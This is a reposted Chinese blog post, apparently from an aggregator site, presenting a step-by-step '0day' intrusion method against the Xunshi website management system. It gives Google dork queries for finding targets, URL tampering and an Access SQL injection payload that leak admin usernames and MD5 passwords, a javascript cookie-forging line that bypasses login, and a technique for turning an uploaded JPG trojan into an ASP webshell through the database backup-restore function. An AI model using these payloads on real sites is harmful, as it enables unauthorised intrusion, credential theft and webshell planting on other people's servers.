???? 首先聲明這方法不是我原創，我是從網上學習來的，由自己的語言重新編譯一下的。

???? 在谷歌搜索 inurl: admin/admin_news_pl_view.asp??? 打開搜索到的網址或者輸入 inurl:news_more.asp?lm2=

???? 然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3

??? 只要顯示錯誤就一直打3，4，5......
??? 找到管理員和32位MDB密碼后破解MDB密碼，然后進后臺? admin/admin_index.asp 輸入破解好的用戶名和密碼直接進系統

另外還可以這樣子進后臺：

|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='???????????? // 得到管理員用戶和MD5密碼
cookies進后臺
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

?在系統里面有上傳圖片的功能，上傳后，再用備份恢復數據庫的功能來恢復上傳好的JPG木馬成 ASP格式，搞定。

轉載于:https://www.cnblogs.com/swane/articles/3540137.html

總結

以上是生活随笔為你收集整理的讯时网站管理系统通杀0DAY漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。